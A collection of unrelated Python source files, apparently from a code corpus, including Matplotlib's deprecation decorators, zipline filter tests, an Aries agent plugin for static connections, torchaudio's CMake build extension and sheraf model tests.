This documentation is only relevant for Matplotlib developers, not for users.
.. warning::
This module is for internal use only. Do not use it in your own code.
We may change the API at any time with no warning.
"""
import contextlib
import functools
import inspect
import math
import warnings
class MatplotlibDeprecationWarning(DeprecationWarning):
"""A class for issuing deprecation warnings for Matplotlib users."""
# mplDeprecation is deprecated. Use MatplotlibDeprecationWarning instead.
# remove when removing the re-import from cbook
mplDeprecation = MatplotlibDeprecationWarning
def _generate_deprecation_warning(
since, message='', name='', alternative='', pending=False, obj_type='',
addendum='', *, removal=''):
if pending:
if removal:
raise ValueError(
"A pending deprecation cannot have a scheduled removal")
else:
removal = f"in {removal}" if removal else "two minor releases later"
if not message:
message = (
("\nThe %(name)s %(obj_type)s" if obj_type else "%(name)s")
+ (" will be deprecated in a future version"
if pending else
(" was deprecated in Matplotlib %(since)s"
+ (" and will be removed %(removal)s" if removal else "")))
+ "."
+ (" Use %(alternative)s instead." if alternative else "")
+ (" %(addendum)s" if addendum else ""))
warning_cls = (PendingDeprecationWarning if pending
else MatplotlibDeprecationWarning)
return warning_cls(message % dict(
func=name, name=name, obj_type=obj_type, since=since, removal=removal,
alternative=alternative, addendum=addendum))
def warn_deprecated(
since, *, message='', name='', alternative='', pending=False,
obj_type='', addendum='', removal=''):
"""
Display a standardized deprecation.
Parameters
----------
since : str
The release at which this API became deprecated.
message : str, optional
Override the default deprecation message. The ``%(since)s``,
``%(name)s``, ``%(alternative)s``, ``%(obj_type)s``, ``%(addendum)s``,
and ``%(removal)s`` format specifiers will be replaced by the values
of the respective arguments passed to this function.
name : str, optional
The name of the deprecated object.
alternative : str, optional
An alternative API that the user may use in place of the deprecated
API. The deprecation warning will tell the user about this alternative
if provided.
pending : bool, optional
If True, uses a PendingDeprecationWarning instead of a
DeprecationWarning. Cannot be used together with *removal*.
obj_type : str, optional
The object type being deprecated.
addendum : str, optional
Additional text appended directly to the final message.
removal : str, optional
The expected removal version. With the default (an empty string), a
removal version is automatically computed from *since*. Set to other
Falsy values to not schedule a removal date. Cannot be used together
with *pending*.
Examples
--------
::
# To warn of the deprecation of "matplotlib.name_of_module"
warn_deprecated('1.4.0', name='matplotlib.name_of_module',
obj_type='module')
"""
warning = _generate_deprecation_warning(
since, message, name, alternative, pending, obj_type, addendum,
removal=removal)
from . import warn_external
warn_external(warning, category=MatplotlibDeprecationWarning)
def deprecated(since, *, message='', name='', alternative='', pending=False,
obj_type=None, addendum='', removal=''):
"""
Decorator to mark a function, a class, or a property as deprecated.
When deprecating a classmethod, a staticmethod, or a property, the
``@deprecated`` decorator should go *under* ``@classmethod`` and
``@staticmethod`` (i.e., `deprecated` should directly decorate the
underlying callable), but *over* ``@property``.
When deprecating a class ``C`` intended to be used as a base class in a
multiple inheritance hierarchy, ``C`` *must* define an ``__init__`` method
(if ``C`` instead inherited its ``__init__`` from its own base class, then
``@deprecated`` would mess up ``__init__`` inheritance when installing its
own (deprecation-emitting) ``C.__init__``).
Parameters are the same as for `warn_deprecated`, except that *obj_type*
defaults to 'class' if decorating a class, 'attribute' if decorating a
property, and 'function' otherwise.
Examples
--------
::
@deprecated('1.4.0')
def the_function_to_deprecate():
pass
"""
def deprecate(obj, message=message, name=name, alternative=alternative,
pending=pending, obj_type=obj_type, addendum=addendum):
from matplotlib._api import classproperty
if isinstance(obj, type):
if obj_type is None:
obj_type = "class"
func = obj.__init__
name = name or obj.__name__
old_doc = obj.__doc__
def finalize(wrapper, new_doc):
try:
obj.__doc__ = new_doc
except AttributeError: # Can't set on some extension objects.
pass
obj.__init__ = functools.wraps(obj.__init__)(wrapper)
return obj
elif isinstance(obj, (property, classproperty)):
if obj_type is None:
obj_type = "attribute"
func = None
name = name or obj.fget.__name__
old_doc = obj.__doc__
class _deprecated_property(type(obj)):
def __get__(self, instance, owner=None):
if instance is not None or owner is not None \
and isinstance(self, classproperty):
emit_warning()
return super().__get__(instance, owner)
def __set__(self, instance, value):
if instance is not None:
emit_warning()
return super().__set__(instance, value)
def __delete__(self, instance):
if instance is not None:
emit_warning()
return super().__delete__(instance)
def __set_name__(self, owner, set_name):
nonlocal name
if name == "<lambda>":
name = set_name
def finalize(_, new_doc):
return _deprecated_property(
fget=obj.fget, fset=obj.fset, fdel=obj.fdel, doc=new_doc)
else:
if obj_type is None:
obj_type = "function"
func = obj
name = name or obj.__name__
old_doc = func.__doc__
def finalize(wrapper, new_doc):
wrapper = functools.wraps(func)(wrapper)
wrapper.__doc__ = new_doc
return wrapper
def emit_warning():
warn_deprecated(
since, message=message, name=name, alternative=alternative,
pending=pending, obj_type=obj_type, addendum=addendum,
removal=removal)
def wrapper(*args, **kwargs):
emit_warning()
return func(*args, **kwargs)
old_doc = inspect.cleandoc(old_doc or '').strip('\n')
notes_header = '\nNotes\n-----'
new_doc = (f"[*Deprecated*] {old_doc}\n"
f"{notes_header if notes_header not in old_doc else ''}\n"
f".. deprecated:: {since}\n"
f" {message.strip()}")
if not old_doc:
# This is to prevent a spurious 'unexpected unindent' warning from
# docutils when the original docstring was blank.
new_doc += r'\ '
return finalize(wrapper, new_doc)
return deprecate
class deprecate_privatize_attribute:
"""
Helper to deprecate public access to an attribute (or method).
This helper should only be used at class scope, as follows::
class Foo:
attr = _deprecate_privatize_attribute(*args, **kwargs)
where *all* parameters are forwarded to `deprecated`. This form makes
``attr`` a property which forwards read and write access to ``self._attr``
(same name but with a leading underscore), with a deprecation warning.
Note that the attribute name is derived from *the name this helper is
assigned to*. This helper also works for deprecating methods.
"""
def __init__(self, *args, **kwargs):
self.deprecator = deprecated(*args, **kwargs)
def __set_name__(self, owner, name):
setattr(owner, name, self.deprecator(
property(lambda self: getattr(self, f"_{name}"),
lambda self, value: setattr(self, f"_{name}", value)),
name=name))
# Used by _copy_docstring_and_deprecators to redecorate pyplot wrappers and
# boilerplate.py to retrieve original signatures. It may seem natural to store
# this information as an attribute on the wrapper, but if the wrapper gets
# itself functools.wraps()ed, then such attributes are silently propagated to
# the outer wrapper, which is not desired.
DECORATORS = {}
def rename_parameter(since, old, new, func=None):
"""
Decorator indicating that parameter *old* of *func* is renamed to *new*.
The actual implementation of *func* should use *new*, not *old*. If *old*
is passed to *func*, a DeprecationWarning is emitted, and its value is
used, even if *new* is also passed by keyword (this is to simplify pyplot
wrapper functions, which always pass *new* explicitly to the Axes method).
If *new* is also passed but positionally, a TypeError will be raised by the
underlying function during argument binding.
Examples
--------
::
@_api.rename_parameter("3.1", "bad_name", "good_name")
def func(good_name): ...
"""
decorator = functools.partial(rename_parameter, since, old, new)
if func is None:
return decorator
signature = inspect.signature(func)
assert old not in signature.parameters, (
f"Matplotlib internal error: {old!r} cannot be a parameter for "
f"{func.__name__}()")
assert new in signature.parameters, (
f"Matplotlib internal error: {new!r} must be a parameter for "
f"{func.__name__}()")
@functools.wraps(func)
def wrapper(*args, **kwargs):
if old in kwargs:
warn_deprecated(
since, message=f"The {old!r} parameter of {func.__name__}() "
f"has been renamed {new!r} since Matplotlib {since}; support "
f"for the old name will be dropped %(removal)s.")
kwargs[new] = kwargs.pop(old)
return func(*args, **kwargs)
# wrapper() must keep the same documented signature as func(): if we
# instead made both *old* and *new* appear in wrapper()'s signature, they
# would both show up in the pyplot function for an Axes method as well and
# pyplot would explicitly pass both arguments to the Axes method.
DECORATORS[wrapper] = decorator
return wrapper
class _deprecated_parameter_class:
def __repr__(self):
return "<deprecated parameter>"
_deprecated_parameter = _deprecated_parameter_class()
def delete_parameter(since, name, func=None, **kwargs):
"""
Decorator indicating that parameter *name* of *func* is being deprecated.
The actual implementation of *func* should keep the *name* parameter in its
signature, or accept a ``**kwargs`` argument (through which *name* would be
passed).
Parameters that come after the deprecated parameter effectively become
keyword-only (as they cannot be passed positionally without triggering the
DeprecationWarning on the deprecated parameter), and should be marked as
such after the deprecation period has passed and the deprecated parameter
is removed.
Parameters other than *since*, *name*, and *func* are keyword-only and
forwarded to `.warn_deprecated`.
Examples
--------
::
@_api.delete_parameter("3.1", "unused")
def func(used_arg, other_arg, unused, more_args): ...
"""
decorator = functools.partial(delete_parameter, since, name, **kwargs)
if func is None:
return decorator
signature = inspect.signature(func)
# Name of `**kwargs` parameter of the decorated function, typically
# "kwargs" if such a parameter exists, or None if the decorated function
# doesn't accept `**kwargs`.
kwargs_name = next((param.name for param in signature.parameters.values()
if param.kind == inspect.Parameter.VAR_KEYWORD), None)
if name in signature.parameters:
kind = signature.parameters[name].kind
is_varargs = kind is inspect.Parameter.VAR_POSITIONAL
is_varkwargs = kind is inspect.Parameter.VAR_KEYWORD
if not is_varargs and not is_varkwargs:
name_idx = (
# Deprecated parameter can't be passed positionally.
math.inf if kind is inspect.Parameter.KEYWORD_ONLY
# If call site has no more than this number of parameters, the
# deprecated parameter can't have been passed positionally.
else [*signature.parameters].index(name))
func.__signature__ = signature = signature.replace(parameters=[
param.replace(default=_deprecated_parameter)
if param.name == name else param
for param in signature.parameters.values()])
else:
name_idx = -1 # Deprecated parameter can always have been passed.
else:
is_varargs = is_varkwargs = False
# Deprecated parameter can't be passed positionally.
name_idx = math.inf
assert kwargs_name, (
f"Matplotlib internal error: {name!r} must be a parameter for "
f"{func.__name__}()")
addendum = kwargs.pop('addendum', None)
@functools.wraps(func)
def wrapper(*inner_args, **inner_kwargs):
if len(inner_args) <= name_idx and name not in inner_kwargs:
# Early return in the simple, non-deprecated case (much faster than
# calling bind()).
return func(*inner_args, **inner_kwargs)
arguments = signature.bind(*inner_args, **inner_kwargs).arguments
if is_varargs and arguments.get(name):
warn_deprecated(
since, message=f"Additional positional arguments to "
f"{func.__name__}() are deprecated since %(since)s and "
f"support for them will be removed %(removal)s.")
elif is_varkwargs and arguments.get(name):
warn_deprecated(
since, message=f"Additional keyword arguments to "
f"{func.__name__}() are deprecated since %(since)s and "
f"support for them will be removed %(removal)s.")
# We cannot just check `name not in arguments` because the pyplot
# wrappers always pass all arguments explicitly.
elif any(name in d and d[name] != _deprecated_parameter
for d in [arguments, arguments.get(kwargs_name, {})]):
deprecation_addendum = (
f"If any parameter follows {name!r}, they should be passed as "
f"keyword, not positionally.")
warn_deprecated(
since,
name=repr(name),
obj_type=f"parameter of {func.__name__}()",
addendum=(addendum + " " + deprecation_addendum) if addendum
else deprecation_addendum,
**kwargs)
return func(*inner_args, **inner_kwargs)
DECORATORS[wrapper] = decorator
return wrapper
def make_keyword_only(since, name, func=None):
"""
Decorator indicating that passing parameter *name* (or any of the following
ones) positionally to *func* is being deprecated.
When used on a method that has a pyplot wrapper, this should be the
outermost decorator, so that :file:`boilerplate.py` can access the original
signature.
"""
decorator = functools.partial(make_keyword_only, since, name)
if func is None:
return decorator
signature = inspect.signature(func)
POK = inspect.Parameter.POSITIONAL_OR_KEYWORD
KWO = inspect.Parameter.KEYWORD_ONLY
assert (name in signature.parameters
and signature.parameters[name].kind == POK), (
f"Matplotlib internal error: {name!r} must be a positional-or-keyword "
f"parameter for {func.__name__}()")
names = [*signature.parameters]
name_idx = names.index(name)
kwonly = [name for name in names[name_idx:]
if signature.parameters[name].kind == POK]
@functools.wraps(func)
def wrapper(*args, **kwargs):
# Don't use signature.bind here, as it would fail when stacked with
# rename_parameter and an "old" argument name is passed in
# (signature.bind would fail, but the actual call would succeed).
if len(args) > name_idx:
warn_deprecated(
since, message="Passing the %(name)s %(obj_type)s "
"positionally is deprecated since Matplotlib %(since)s; the "
"parameter will become keyword-only %(removal)s.",
name=name, obj_type=f"parameter of {func.__name__}()")
return func(*args, **kwargs)
# Don't modify *func*'s signature, as boilerplate.py needs it.
wrapper.__signature__ = signature.replace(parameters=[
param.replace(kind=KWO) if param.name in kwonly else param
for param in signature.parameters.values()])
DECORATORS[wrapper] = decorator
return wrapper
def deprecate_method_override(method, obj, *, allow_empty=False, **kwargs):
"""
Return ``obj.method`` with a deprecation if it was overridden, else None.
Parameters
----------
method
An unbound method, i.e. an expression of the form
``Class.method_name``. Remember that within the body of a method, one
can always use ``__class__`` to refer to the class that is currently
being defined.
obj
Either an object of the class where *method* is defined, or a subclass
of that class.
allow_empty : bool, default: False
Whether to allow overrides by "empty" methods without emitting a
warning.
**kwargs
Additional parameters passed to `warn_deprecated` to generate the
deprecation warning; must at least include the "since" key.
"""
def empty(): pass
def empty_with_docstring(): """doc"""
name = method.__name__
bound_child = getattr(obj, name)
bound_base = (
method # If obj is a class, then we need to use unbound methods.
if isinstance(bound_child, type(empty)) and isinstance(obj, type)
else method.__get__(obj))
if (bound_child != bound_base
and (not allow_empty
or (getattr(getattr(bound_child, "__code__", None),
"co_code", None)
not in [empty.__code__.co_code,
empty_with_docstring.__code__.co_code]))):
warn_deprecated(**{"name": name, "obj_type": "method", **kwargs})
return bound_child
return None
@contextlib.contextmanager
def suppress_matplotlib_deprecation_warning():
with warnings.catch_warnings():
warnings.simplefilter("ignore", MatplotlibDeprecationWarning)
yield
|
py | b415364b3ac2b5b5b7c9b0ac248230d0955bec0b | """
Tests for filter terms.
"""
from unittest import TestCase
from numpy import (
arange,
array,
eye,
float64,
nan,
nanpercentile,
ones_like,
putmask,
)
from numpy.testing import assert_array_equal
from pandas import (
DataFrame,
date_range,
Int64Index,
)
from zipline.errors import BadPercentileBounds
from zipline.modelling.factor import TestingFactor
class SomeFactor(TestingFactor):
inputs = ()
window_length = 0
class FilterTestCase(TestCase):
def setUp(self):
self.f = SomeFactor()
self.dates = date_range('2014-01-01', periods=5, freq='D')
self.assets = Int64Index(range(5))
self.mask = DataFrame(True, index=self.dates, columns=self.assets)
def tearDown(self):
pass
def maskframe(self, array):
return DataFrame(
array,
index=date_range('2014-01-01', periods=array.shape[0], freq='D'),
columns=arange(array.shape[1]),
)
def test_bad_input(self):
f = self.f
bad_percentiles = [
(-.1, 10),
(10, 100.1),
(20, 10),
(50, 50),
]
for min_, max_ in bad_percentiles:
with self.assertRaises(BadPercentileBounds):
f.percentile_between(min_, max_)
def test_rank_percentile_nice_partitions(self):
# Test case with nicely-defined partitions.
eye5 = eye(5, dtype=float64)
eye6 = eye(6, dtype=float64)
nanmask = array([[0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 0]], dtype=bool)
nandata = eye6.copy()
putmask(nandata, nanmask, nan)
for quintile in range(5):
factor = self.f.percentile_between(
quintile * 20.0,
(quintile + 1) * 20.0,
)
# Test w/o any NaNs
result = factor.compute_from_arrays(
[eye5],
self.maskframe(ones_like(eye5, dtype=bool)),
)
# Test with NaNs in the data.
nandata_result = factor.compute_from_arrays(
[nandata],
self.maskframe(ones_like(nandata, dtype=bool)),
)
# Test with Falses in the mask.
nanmask_result = factor.compute_from_arrays(
[eye6],
self.maskframe(~nanmask),
)
assert_array_equal(nandata_result, nanmask_result)
if quintile < 4:
# There are 4 0s and one 1 in each row, so the first 4
# quintiles should be all the locations with zeros in the input
# array.
assert_array_equal(result, ~eye5.astype(bool))
# Should reject all the ones, plus the nans.
assert_array_equal(
nandata_result,
~(nanmask | eye6.astype(bool))
)
else:
# The last quintile should contain all the 1s.
assert_array_equal(result, eye(5, dtype=bool))
# Should accept all the 1s.
assert_array_equal(nandata_result, eye(6, dtype=bool))
def test_rank_percentile_nasty_partitions(self):
# Test case with nasty partitions: divide up 5 assets into quartiles.
data = arange(25, dtype=float).reshape(5, 5) % 4
nandata = data.copy()
nandata[eye(5, dtype=bool)] = nan
for quartile in range(4):
lower_bound = quartile * 25.0
upper_bound = (quartile + 1) * 25.0
factor = self.f.percentile_between(lower_bound, upper_bound)
# There isn't a nice definition of correct behavior here, so for
# now we guarantee the behavior of numpy.nanpercentile.
result = factor.compute_from_arrays([data], self.mask)
min_value = nanpercentile(data, lower_bound, axis=1, keepdims=True)
max_value = nanpercentile(data, upper_bound, axis=1, keepdims=True)
assert_array_equal(
result,
(min_value <= data) & (data <= max_value),
)
nanresult = factor.compute_from_arrays([nandata], self.mask)
min_value = nanpercentile(
nandata,
lower_bound,
axis=1,
keepdims=True,
)
max_value = nanpercentile(
nandata,
upper_bound,
axis=1,
keepdims=True,
)
assert_array_equal(
nanresult,
(min_value <= nandata) & (nandata <= max_value),
)
def test_sequenced_filter(self):
first = SomeFactor() < 1
first_input = eye(5)
first_result = first.compute_from_arrays([first_input], self.mask)
assert_array_equal(first_result, ~eye(5, dtype=bool))
# Second should pick out the fourth column.
second = SomeFactor().eq(3.0)
second_input = arange(25, dtype=float).reshape(5, 5) % 5
sequenced = first.then(second)
result = sequenced.compute_from_arrays(
[first_result, second_input],
self.mask,
)
expected_result = (first_result & (second_input == 3.0))
assert_array_equal(result, expected_result)
def test_sequenced_filter_order_dependent(self):
f = SomeFactor() < 1
f_input = eye(5)
f_result = f.compute_from_arrays([f_input], self.mask)
assert_array_equal(f_result, ~eye(5, dtype=bool))
g = SomeFactor().percentile_between(80, 100)
g_input = arange(25, dtype=float).reshape(5, 5) % 5
g_result = g.compute_from_arrays([g_input], self.mask)
assert_array_equal(g_result, g_input == 4)
result = f.then(g).compute_from_arrays(
[f_result, g_input],
self.mask,
)
# Input data is strictly increasing, so the result should be the top
# value not filtered by first.
expected_result = array(
[[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 1, 0]],
dtype=bool,
)
assert_array_equal(result, expected_result)
result = g.then(f).compute_from_arrays(
[g_result, f_input],
self.mask,
)
# Percentile calculated first, then diagonal is removed.
expected_result = array(
[[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]],
dtype=bool,
)
assert_array_equal(result, expected_result)
|
py | b4153727003983bde722f09402284f415bc08338 | from django.conf.urls import url
from .views import GetAuthToken, GetAuthTokenFacebook
urlpatterns = [
url(r'^$', GetAuthToken.as_view()),
url(r'^facebook/$', GetAuthTokenFacebook.as_view()),
]
|
py | b41537e682975d47032a5e114fa1e79ea9cae067 |
from my import print_hello
#import my
print_hello()
|
py | b41538028ec54a0b3e2a1d78a7866affad717f58 | """
13771. Presents
작성자: xCrypt0r
언어: Python 3
사용 메모리: 29,380 KB
소요 시간: 64 ms
해결 날짜: 2020년 9월 24일
"""
from sys import stdin
input = stdin.readline
def main():
prices = sorted([float(input()) for _ in range(int(input()))])
print(f'{prices[1]:.2f}')
if __name__ == '__main__':
main() |
py | b41538426f591cf112e3bf69b6a02812d3e3e56f | """Define messages for static connections management admin protocol."""
# pylint: disable=invalid-name
# pylint: disable=too-few-public-methods
from marshmallow import fields, validate
from aries_cloudagent.wallet.base import BaseWallet
from aries_cloudagent.messaging.base_handler import BaseHandler, BaseResponder, RequestContext
from aries_cloudagent.protocols.connections.manager import ConnectionManager
from aries_cloudagent.connections.models.connection_record import ConnectionRecord
from aries_cloudagent.connections.models.diddoc import (
DIDDoc, PublicKey, PublicKeyType, Service
)
from aries_cloudagent.protocols.problem_report.message import ProblemReport
from aries_cloudagent.storage.error import StorageNotFoundError
from .util import generate_model_schema, admin_only
PROTOCOL = 'did:sov:BzCbsNYhMrjHiqZDTUASHg;spec/admin-static-connections/0.1'
# Message Types
CREATE_STATIC_CONNECTION = '{}/create-static-connection'.format(PROTOCOL)
STATIC_CONNECTION_INFO = '{}/static-connection-info'.format(PROTOCOL)
STATIC_CONNECTION_GET_LIST = '{}/static-connection-get-list'.format(PROTOCOL)
STATIC_CONNECTION_LIST = '{}/static-connection-list'.format(PROTOCOL)
# Message Type to Message Class Map
MESSAGE_TYPES = {
CREATE_STATIC_CONNECTION:
'acapy_plugin_toolbox.static_connections'
'.CreateStaticConnection',
STATIC_CONNECTION_INFO:
'acapy_plugin_toolbox.static_connections'
'.StaticConnectionInfo',
STATIC_CONNECTION_GET_LIST:
'acapy_plugin_toolbox.static_connections'
'.StaticConnectionGetList',
STATIC_CONNECTION_LIST:
'acapy_plugin_toolbox.static_connections'
'.StaticConnectionList',
}
# Models and Schemas
CreateStaticConnection, CreateStaticConnectionSchema = generate_model_schema(
name='CreateStaticConnection',
handler='acapy_plugin_toolbox.static_connections'
'.CreateStaticConnectionHandler',
msg_type=CREATE_STATIC_CONNECTION,
schema={
'label': fields.Str(required=True),
'role': fields.Str(required=False),
'static_did': fields.Str(required=True),
'static_key': fields.Str(required=True),
'static_endpoint': fields.Str(missing='')
}
)
StaticConnectionInfo, StaticConnectionInfoSchema = generate_model_schema(
name='StaticConnectionInfo',
handler='acapy_plugin_toolbox.static_connections'
'.StaticConnectionInfoHandler',
msg_type=STATIC_CONNECTION_INFO,
schema={
'did': fields.Str(required=True),
'key': fields.Str(required=True),
'endpoint': fields.Str(required=True)
}
)
class CreateStaticConnectionHandler(BaseHandler):
"""Handler for static connection creation requests."""
@admin_only
async def handle(self, context: RequestContext, responder: BaseResponder):
"""Handle static connection creation request."""
connection_mgr = ConnectionManager(context)
wallet: BaseWallet = await context.inject(BaseWallet)
# Make our info for the connection
my_info = await wallet.create_local_did()
# Create connection record
connection = ConnectionRecord(
initiator=ConnectionRecord.INITIATOR_SELF,
my_did=my_info.did,
their_did=context.message.static_did,
their_label=context.message.label,
their_role=context.message.role if context.message.role else None,
state=ConnectionRecord.STATE_ACTIVE,
invitation_mode=ConnectionRecord.INVITATION_MODE_STATIC
)
# Construct their did doc from the basic components in message
diddoc = DIDDoc(context.message.static_did)
public_key = PublicKey(
did=context.message.static_did,
ident="1",
value=context.message.static_key,
pk_type=PublicKeyType.ED25519_SIG_2018,
controller=context.message.static_did
)
service = Service(
did=context.message.static_did,
ident="indy",
typ="IndyAgent",
recip_keys=[public_key],
routing_keys=[],
endpoint=context.message.static_endpoint
)
diddoc.set(public_key)
diddoc.set(service)
# Save
await connection_mgr.store_did_document(diddoc)
await connection.save(
context,
reason='Created new static connection'
)
# Prepare response
info = StaticConnectionInfo(
did=my_info.did,
key=my_info.verkey,
endpoint=context.settings.get("default_endpoint")
)
info.assign_thread_from(context.message)
await responder.send_reply(info)
return
StaticConnectionGetList, StaticConnectionGetListSchema = generate_model_schema(
name='StaticConnectionGetList',
handler='acapy_plugin_toolbox.static_connections'
'.StaticConnectionGetListHandler',
msg_type=STATIC_CONNECTION_GET_LIST,
schema={
'initiator': fields.Str(
validate=validate.OneOf(['self', 'external']),
required=False,
),
'invitation_key': fields.Str(required=False),
'my_did': fields.Str(required=False),
'their_did': fields.Str(required=False),
'their_role': fields.Str(required=False)
}
)
StaticConnectionList, StaticConnectionListSchema = generate_model_schema(
name='StaticConnectionList',
handler='acapy_plugin_toolbox.util.PassHandler',
msg_type=STATIC_CONNECTION_LIST,
schema={
'results': fields.List(fields.Dict(
connection_id=fields.Str(),
their_info=fields.Dict(
label=fields.Str(),
did=fields.Str(),
vk=fields.Str(),
endpoint=fields.Str()
),
my_info=fields.Dict(
label=fields.Str(),
did=fields.Str(),
vk=fields.Str(),
endpoint=fields.Str()
)
))
}
)
class StaticConnectionGetListHandler(BaseHandler):
"""Handler for static connection get list requests."""
@admin_only
async def handle(self, context: RequestContext, responder: BaseResponder):
"""Handle static connection get list request."""
connection_mgr = ConnectionManager(context)
wallet: BaseWallet = await context.inject(BaseWallet)
try:
tag_filter = dict(
filter(lambda item: item[1] is not None, {
'initiator': context.message.initiator,
'invitation_key': context.message.invitation_key,
'my_did': context.message.my_did,
'invitation_mode': ConnectionRecord.INVITATION_MODE_STATIC,
'their_did': context.message.their_did,
'their_role': context.message.their_role
}.items())
)
records = await ConnectionRecord.query(context, tag_filter)
except StorageNotFoundError:
report = ProblemReport(
explain_ltxt='Connection not found.',
who_retries='none'
)
report.assign_thread_from(context.message)
await responder.send_reply(report)
return
def flatten_target(connection, target, my_info):
"""Map for flattening results."""
return {
'connection_id': connection.connection_id,
'their_info': {
'label': target.label,
'did': target.did,
'vk': target.recipient_keys[0],
'endpoint': target.endpoint
},
'my_info': {
'did': my_info.did,
'vk': my_info.verkey,
'endpoint': context.settings.get("default_endpoint")
}
}
targets = []
my_info = []
for record in records:
targets.append(
await connection_mgr.get_connection_target(record)
)
my_info.append(await wallet.get_local_did(record.my_did))
results = list(map(
flatten_target,
records,
targets,
my_info
))
static_connections = StaticConnectionList(results=results)
static_connections.assign_thread_from(context.message)
await responder.send_reply(static_connections)
|
py | b415388a70b99fa12a18dc0a0455347b2898dd1a | import os
import platform
import subprocess
from pathlib import Path
import distutils.sysconfig
from setuptools import Extension
from setuptools.command.build_ext import build_ext
import torch
__all__ = [
'get_ext_modules',
'CMakeBuild',
]
_THIS_DIR = Path(__file__).parent.resolve()
_ROOT_DIR = _THIS_DIR.parent.parent.resolve()
_TORCHAUDIO_DIR = _ROOT_DIR / 'torchaudio'
def _get_build(var, default=False):
if var not in os.environ:
return default
val = os.environ.get(var, '0')
trues = ['1', 'true', 'TRUE', 'on', 'ON', 'yes', 'YES']
falses = ['0', 'false', 'FALSE', 'off', 'OFF', 'no', 'NO']
if val in trues:
return True
if val not in falses:
print(
f'WARNING: Unexpected environment variable value `{var}={val}`. '
f'Expected one of {trues + falses}')
return False
_BUILD_SOX = False if platform.system() == 'Windows' else _get_build("BUILD_SOX", True)
_BUILD_KALDI = False if platform.system() == 'Windows' else _get_build("BUILD_KALDI", True)
_BUILD_RNNT = _get_build("BUILD_RNNT", True)
_USE_ROCM = _get_build("USE_ROCM", torch.cuda.is_available() and torch.version.hip is not None)
_USE_CUDA = _get_build("USE_CUDA", torch.cuda.is_available() and torch.version.hip is None)
_TORCH_CUDA_ARCH_LIST = os.environ.get('TORCH_CUDA_ARCH_LIST', None)
def get_ext_modules():
return [Extension(name='torchaudio._torchaudio', sources=[])]
# Based off of
# https://github.com/pybind/cmake_example/blob/580c5fd29d4651db99d8874714b07c0c49a53f8a/setup.py
class CMakeBuild(build_ext):
def run(self):
try:
subprocess.check_output(['cmake', '--version'])
except OSError:
raise RuntimeError("CMake is not available.")
super().run()
def build_extension(self, ext):
extdir = os.path.abspath(
os.path.dirname(self.get_ext_fullpath(ext.name)))
# required for auto-detection of auxiliary "native" libs
if not extdir.endswith(os.path.sep):
extdir += os.path.sep
cfg = "Debug" if self.debug else "Release"
cmake_args = [
f"-DCMAKE_BUILD_TYPE={cfg}",
f"-DCMAKE_PREFIX_PATH={torch.utils.cmake_prefix_path}",
f"-DCMAKE_INSTALL_PREFIX={extdir}",
'-DCMAKE_VERBOSE_MAKEFILE=ON',
f"-DPython_INCLUDE_DIR={distutils.sysconfig.get_python_inc()}",
f"-DBUILD_SOX:BOOL={'ON' if _BUILD_SOX else 'OFF'}",
f"-DBUILD_KALDI:BOOL={'ON' if _BUILD_KALDI else 'OFF'}",
f"-DBUILD_RNNT:BOOL={'ON' if _BUILD_RNNT else 'OFF'}",
"-DBUILD_TORCHAUDIO_PYTHON_EXTENSION:BOOL=ON",
"-DBUILD_LIBTORCHAUDIO:BOOL=OFF",
f"-DUSE_ROCM:BOOL={'ON' if _USE_ROCM else 'OFF'}",
f"-DUSE_CUDA:BOOL={'ON' if _USE_CUDA else 'OFF'}",
]
build_args = [
'--target', 'install'
]
# Pass CUDA architecture to cmake
if _TORCH_CUDA_ARCH_LIST is not None:
# Convert MAJOR.MINOR[+PTX] list to new style one
# defined at https://cmake.org/cmake/help/latest/prop_tgt/CUDA_ARCHITECTURES.html
_arches = _TORCH_CUDA_ARCH_LIST.replace('.', '').split(";")
_arches = [arch[:-4] if arch.endswith("+PTX") else f"{arch}-real" for arch in _arches]
cmake_args += [f"-DCMAKE_CUDA_ARCHITECTURES={';'.join(_arches)}"]
# Default to Ninja
if 'CMAKE_GENERATOR' not in os.environ or platform.system() == 'Windows':
cmake_args += ["-GNinja"]
if platform.system() == 'Windows':
import sys
python_version = sys.version_info
cmake_args += [
"-DCMAKE_C_COMPILER=cl",
"-DCMAKE_CXX_COMPILER=cl",
f"-DPYTHON_VERSION={python_version.major}.{python_version.minor}",
]
# Set CMAKE_BUILD_PARALLEL_LEVEL to control the parallel build level
# across all generators.
if "CMAKE_BUILD_PARALLEL_LEVEL" not in os.environ:
# self.parallel is a Python 3 only way to set parallel jobs by hand
# using -j in the build_ext call, not supported by pip or PyPA-build.
if hasattr(self, "parallel") and self.parallel:
# CMake 3.12+ only.
build_args += ["-j{}".format(self.parallel)]
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
subprocess.check_call(
["cmake", str(_ROOT_DIR)] + cmake_args, cwd=self.build_temp)
subprocess.check_call(
["cmake", "--build", "."] + build_args, cwd=self.build_temp)
def get_ext_filename(self, fullname):
ext_filename = super().get_ext_filename(fullname)
ext_filename_parts = ext_filename.split('.')
without_abi = ext_filename_parts[:-2] + ext_filename_parts[-1:]
ext_filename = '.'.join(without_abi)
return ext_filename
|
py | b415388af430b1ef278d51ddd7b25621e2cf18d4 | import uuid
import pytest
import sheraf
import tests
class Horse(sheraf.AttributeModel):
name = sheraf.StringAttribute().index(primary=True)
size = sheraf.IntegerAttribute()
class Cowboy(tests.UUIDAutoModel):
name = sheraf.StringAttribute()
horses = sheraf.IndexedModelAttribute(Horse)
def test_create(sheraf_connection):
george = Cowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
assert "Jolly Jumper" == jolly.name
assert jolly.mapping == george.mapping["horses"]["name"]["Jolly Jumper"]
def test_read(sheraf_database):
with sheraf.connection(commit=True):
george = Cowboy.create(name="George")
jolly = george.horses.create(name="Jolly Jumper")
assert jolly == george.horses.read("Jolly Jumper")
assert jolly == george.horses.read(name="Jolly Jumper")
with sheraf.connection():
george = Cowboy.read(george.id)
assert jolly == george.horses.read("Jolly Jumper")
assert jolly == george.horses.read(name="Jolly Jumper")
with pytest.raises(sheraf.ModelObjectNotFoundException):
george.horses.read("any horse")
